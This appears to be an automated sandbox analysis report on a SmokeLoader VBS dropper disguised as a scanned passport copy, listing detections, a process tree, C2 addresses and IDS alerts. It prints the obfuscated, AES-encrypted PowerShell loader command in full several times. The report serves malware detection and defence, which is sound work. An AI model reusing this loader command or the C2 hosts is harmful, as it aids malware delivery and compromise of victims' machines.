Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs

Overview

General Information

Sample name:#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs
renamed because original name is a hash value
Original sample name:-i .vbs
Analysis ID:1577216
MD5:e6cba366210db05b0c86115900a17133
SHA1:f3cc53aa5b7a037a8027d8d1703ab5c367687237
SHA256:dada50182ca98f75e0055f9b4a47d8ef3a6dda5c126cac309467c02257f3c1c0
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Downloads files with wrong headers with respect to MIME Content-Type
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2680 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4345678EAB2756D340EA7C849F355578CB519AA0DE8625F493EADBD13583073BE0D247EBD15CD925FE851855979D18651080CF3BD6FB803715B373C134F7D1EA1E3FAB7E02D0D4AD6FC40EAD36C911A1AE73D421AC10EFE01473747C3B4FC05FD6D4D08C3521DB6BA6E9EEF6CB8B1C7FC76884C910C22860E3575831C23A88693A6D7FE1F158E001ED75B4588C08ED639A5B3F223E76CF1C17495201F16D4149F714CA4BD42D2D5E17399CF5E4FCAE83C94E9DBA2089F3C430CE2585999674221CE62E61DCB128072E936B5DFED4CEBEEBA9232E582C33488E026E0F5123211B5E9B12B46C0CA95D1F9A903B6B2310CB4E108C5C9B8328E9021E1B76EAE56EF681BBC20E3C74BCCAA8E25DECF9C13896D1252B4B86B2315F62ECC43FDD7F9D446C70E046C7872722C69950AC7A26563C81C0A52F3B0F0D43D41FE0060D34820472AE9A9818D2FD3B117A4B0084EAA21D1666A9297DCAEACADD63462FBB1E22C56869537CA0C0E1CD52EABFF12858BC9B1DDDC8CB4C70E9FA2549B5144F447D1DEFC94F5830D9CAC04660B19C385EC1A3D989AC7BAD8C3E7E908C697C4DA249D156475901B73F3C800C602E586AA6998C17EB947E3D2E8A13E7292546210AF7EB29B003DA7407AF81F5B7811619B414E06D1D724EF79FE960509F6D85F4B55A5B6A365F6EE49825F0B19433EA2C64737468F1FAA1DDA90E230F23CB6751052459789FAC25AB27097516E251B4C56D5B1497389F33F64F9C729FADB9F635E6771D884FFAD2363C3D29D49812042636E0B8AAEE30');$idRJO=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wfMpF('4F6C6D774C5361495051654D7258624F')),[byte[]]::new(16)).TransformFinalBlock($Ralma,0,$Ralma.Length)); & $idRJO.Substring(0,3) $idRJO.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Acrobat.exe (PID: 3872 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\invoce2.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 6716 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 3620 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1768,i,4178814619704218738,12566642219925520578,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • putty.exe (PID: 4796 cmdline: "C:\Users\user\AppData\Roaming\putty.exe" MD5: C09AA26230A2083DA9032866FD33703D)
        • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • svchost.exe (PID: 6768 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ddhfdfu (PID: 7976 cmdline: C:\Users\user\AppData\Roaming\ddhfdfu MD5: C09AA26230A2083DA9032866FD33703D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}
SourceRuleDescriptionAuthorStrings
00000006.00000002.2239564314.00000000021D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000006.00000002.2239564314.00000000021D0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x604:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000006.00000002.2239633273.0000000002211000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000006.00000002.2239633273.0000000002211000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x204:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      0000000D.00000002.2474381607.0000000000751000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        Click to see the 10 entries
        SourceRuleDescriptionAuthorStrings
        6.3.putty.exe.1f90000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          13.3.ddhfdfu.620000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            6.2.putty.exe.6d0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              6.2.putty.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                13.2.ddhfdfu.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  Click to see the 1 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs", ProcessId: 2680, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4345678EAB2756D340EA7C849F355578CB519AA0DE8625F493EADBD13583073BE0D247EBD15CD925FE851855979D18651080CF3BD6FB803715B373C134F7D1EA1E3FAB7E02D0D4AD6FC40EAD36C911A1AE73D421AC10EFE01473747C3B4FC05FD6D4D08C3521DB6BA6E9EEF6CB8B1C7FC76884C910C22860E3575831C23A88693A6D7FE1F158E001ED75B4588C08ED639A5B3F223E76CF1C17495201F16D4149F714CA4BD42D2D5E17399CF5E4FCAE83C94E9DBA2089F3C430CE2585999674221CE62E61DCB128072E936B5DFED4CEBEEBA9232E582C33488E026E0F5123211B5E9B12B46C0CA95D1F9A903B6B2310CB4E108C5C9B8328E9021E1B76EAE56EF681BBC20E3C74BCCAA8E25DECF9C13896D1252B4B86B2315F62ECC43FDD7F9D446C70E046C7872722C69950AC7A26563C81C0A52F3B0F0D43D41FE0060D34820472AE9A9818D2FD3B117A4B0084EAA21D1666A9297DCAEACADD63462FBB1E22C56869537CA0C0E1CD52EABFF12858BC9B1DDDC8CB4C70E9FA2549B5144F447D1DEFC94F5830D9CAC04660B19C385EC1A3D989AC7BAD8C3E7E908C697C4DA249D156475901B73F3C800C602E586AA6998C17EB947E3D2E8A13E7292546210AF7EB29B003DA7407AF81F5B7811619B414E06D1D724EF79FE960509F6D85F4B55A5B6A365F6EE49825F0B19433EA2C64737468F1FAA1DDA90E230F23CB6751052459789FAC25AB27097516E251B4C56D5B1497389F33F64F9C729FADB9F635E6771D884FFAD2363C3D29D49812042636E0B8AAEE30');$idRJO=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wfMpF('4F6C6D774C5361495051654D7258624F')),[byte[]]::new(16)).TransformFinalBlock($Ralma,0,$Ralma.Length)); & $idRJO.Substring(0,3) $idRJO.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ddhfdfu, CommandLine: C:\Users\user\AppData\Roaming\ddhfdfu, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ddhfdfu, NewProcessName: C:\Users\user\AppData\Roaming\ddhfdfu, OriginalFileName: C:\Users\user\AppData\Roaming\ddhfdfu, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\ddhfdfu, ProcessId: 7976, ProcessName: ddhfdfu
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6640, TargetFilename: C:\Users\user\AppData\Roaming\putty.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U0421#U043a#U0430#U043d-#U043a#U043e#U043fi#U044f #U041f#U0430#U0441#U043f#U043e#U0440#U0442.vbs", ProcessId: 2680, ProcessName: wscript.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4345678EAB2756D340EA7C849F355578CB519AA0DE8625F493EADBD13583073BE0D247EBD15CD925FE851855979D18651080CF3BD6FB803715B373C134F7D1EA1E3FAB7E02D0D4AD6FC40EAD36C911A1AE73D421AC10EFE01473747C3B4FC05FD6D4D08C3521DB6BA6E9EEF6CB8B1C7FC76884C910C22860E3575831C23A88693A6D7FE1F158E001ED75B4588C08ED639A5B3F223E76CF1C17495201F16D4149F714CA4BD42D2D5E17399CF5E4FCAE83C94E9DBA2089F3C430CE2585999674221CE62E61DCB128072E936B5DFED4CEBEEBA9232E582C33488E026E0F5123211B5E9B12B46C0CA95D1F9A903B6B2310CB4E108C5C9B8328E9021E1B76EAE56EF681BBC20E3C74BCCAA8E25DECF9C13896D1252B4B86B2315F62ECC43FDD7F9D446C70E046C7872722C69950AC7A26563C81C0A52F3B0F0D43D41FE0060D34820472AE9A9818D2FD3B117A4B0084EAA21D1666A9297DCAEACADD63462FBB1E22C56869537CA0C0E1CD52EABFF12858BC9B1DDDC8CB4C70E9FA2549B5144F447D1DEFC94F5830D9CAC04660B19C385EC1A3D989AC7BAD8C3E7E908C697C4DA249D156475901B73F3C800C602E586AA6998C17EB947E3D2E8A13E7292546210AF7EB29B003DA7407AF81F5B7811619B414E06D1D724EF79FE960509F6D85F4B55A5B6A365F6EE49825F0B19433EA2C64737468F1FAA1DDA90E230F23CB6751052459789FAC25AB27097516E251B4C56D5B1497389F33F64F9C729FADB9F635E6771D884FFAD2363C3D29D49812042636E0B8AAEE30');$idRJO=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wfMpF('4F6C6D774C5361495051654D7258624F')),[byte[]]::new(16)).TransformFinalBlock($Ralma,0,$Ralma.Length)); & $idRJO.Substring(0,3) $idRJO.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4345678EAB2756D340EA7C849F355578CB519AA0DE8625F493EADBD13583073BE0D247EBD15CD925FE851855979D18651080CF3BD6FB803715B373C134F7D1EA1E3FAB7E02D0D4AD6FC40EAD36C911A1AE73D421AC10EFE01473747C3B4FC05FD6D4D08C3521DB6BA6E9EEF6CB8B1C7FC76884C910C22860E3575831C23A88693A6D7FE1F158E001ED75B4588C08ED639A5B3F223E76CF1C17495201F16D4149F714CA4BD42D2D5E17399CF5E4FCAE83C94E9DBA2089F3C430CE2585999674221CE62E61DCB128072E936B5DFED4CEBEEBA9232E582C33488E026E0F5123211B5E9B12B46C0CA95D1F9A903B6B2310CB4E108C5C9B8328E9021E1B76EAE56EF681BBC20E3C74BCCAA8E25DECF9C13896D1252B4B86B2315F62ECC43FDD7F9D446C70E046C7872722C69950AC7A26563C81C0A52F3B0F0D43D41FE0060D34820472AE9A9818D2FD3B117A4B0084EAA21D1666A9297DCAEACADD63462FBB1E22C56869537CA0C0E1CD52EABFF12858BC9B1DDDC8CB4C70E9FA2549B5144F447D1DEFC94F5830D9CAC04660B19C385EC1A3D989AC7BAD8C3E7E908C697C4DA249D156475901B73F3C800C602E586AA6998C17EB947E3D2E8A13E7292546210AF7EB29B003DA7407AF81F5B7811619B414E06D1D724EF79FE960509F6D85F4B55A5B6A365F6EE49825F0B19433EA2C64737468F1FAA1DDA90E230F23CB6751052459789FAC25AB27097516E251B4C56D5B1497389F33F64F9C729FADB9F635E6771D884FFAD2363C3D29D49812042636E0B8AAEE30');$idRJO=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((wfMpF('4F6C6D774C5361495051654D7258624F')),[byte[]]::new(16)).TransformFinalBlock($Ralma,0,$Ralma.Length)); & $idRJO.Substring(0,3) $idRJO.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wfMpF($MmiD){return -split ($MmiD -replace '..', '0x$& ')};$Ralma = wfMpF('6DDD913A204EDA9B48CF5583720FA53B3C5CDEE6E974B7BF173341D66880A83528E76A5A809EDA47D2C263E95E00A51AE2A33D069542CCAE0C0FEF761523C7AFE37B64185C653B4C4BF39E67E1D89CD6636984FC646C493C76294187D1B2B75D79DBAAB680164B0C94848AA09BF281C313B7C3C2532160823EFECF40AF7A9240375A29DD3D82C002B29486566C166F6F04711F20F7F5B2B6CDC61AA7908A19FE7DE86886141F7A340433F1A7D86ED97FA28C2AC93960B814156D48D922F4B029C07206C1AEF6B44FF7AF133921B3DB8F2FF073F4CFFA862EDB9214CE28C296D8FB5162D5AB69B39935125AB3242B742A33D4141147FCF532EEB49A69FEA321ACE3E5BFFDC1520FB98A143BBAFD22BB525550D37D463F288C61A14B1258687EB239E9A260D0E160D9614F09967FE97F9B2CE6BE1C24011E78CAAB16CEEA4
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6768, ProcessName: svchost.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-18T09:23:10.221075+010020391031A Network Trojan was detected192.168.2.549968109.70.26.3780TCP
                  2024-12-18T09:23:53.418120+010020391031A Network Trojan was detected192.168.2.54976694.156.177.5180TCP
                  2024-12-18T09:23:55.402515+010020391031A Network Trojan was detected192.168.2.54977294.156.177.5180TCP
                  2024-12-18T09:23:57.246237+010020391031A Network Trojan was detected192.168.2.549778109.70.26.3780TCP
                  2024-12-18T09:25:03.621337+010020391031A Network Trojan was detected192.168.2.54993094.156.177.5180TCP
                  2024-12-18T09:25:05.246394+010020391031A Network Trojan was detected192.168.2.54993694.156.177.5180TCP
                  2024-12-18T09:25:06.730879+010020391031A Network Trojan was detected192.168.2.549938109.70.26.3780TCP
                  2024-12-18T09:25:08.804225+010020391031A Network Trojan was detected192.168.2.54994494.156.177.5180TCP
                  2024-12-18T09:25:10.363496+010020391031A Network Trojan was detected192.168.2.54994994.156.177.5180TCP
                  2024-12-18T09:25:11.933852+010020391031A Network Trojan was detected192.168.2.549955109.70.26.3780TCP
                  2024-12-18T09:25:14.324466+010020391031A Network Trojan was detected192.168.2.54996194.156.177.5180TCP
                  2024-12-18T09:25:15.824514+010020391031A Network Trojan was detected192.168.2.54996394.156.177.5180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-18T09:23:22.147886+010028033053Unknown Traffic192.168.2.54970494.156.177.5180TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-18T09:23:53.418120+010028518151A Network Trojan was detected192.168.2.54976694.156.177.5180TCP
                  2024-12-18T09:25:03.621337+010028518151A Network Trojan was detected192.168.2.54993094.156.177.5180TCP
                  2024-12-18T09:25:08.804225+010028518151A Network Trojan was detected192.168.2.54994494.156.177.5180TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: C:\Users\user\AppData\Roaming\putty.exeAvira: detection malicious, Label: HEUR/AGEN.1306956
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuAvira: detection malicious, Label: HEUR/AGEN.1306956
                  Source: 00000006.00000002.2239564314.00000000021D0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://constractionscity1991.lat/", "http://restructurisationservice.ru/", "http://connecticutproperty.ru/"]}
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Roaming\putty.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\ddhfdfuJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\putty.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Software Vulnerabilities

                  barindex
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49778 -> 109.70.26.37:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49772 -> 94.156.177.51:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49766 -> 94.156.177.51:80
                  Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49766 -> 94.156.177.51:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49930 -> 94.156.177.51:80
                  Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.5:49930 -> 94.156.177.51:80
                  Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49936 -> 94.156.177.51:80
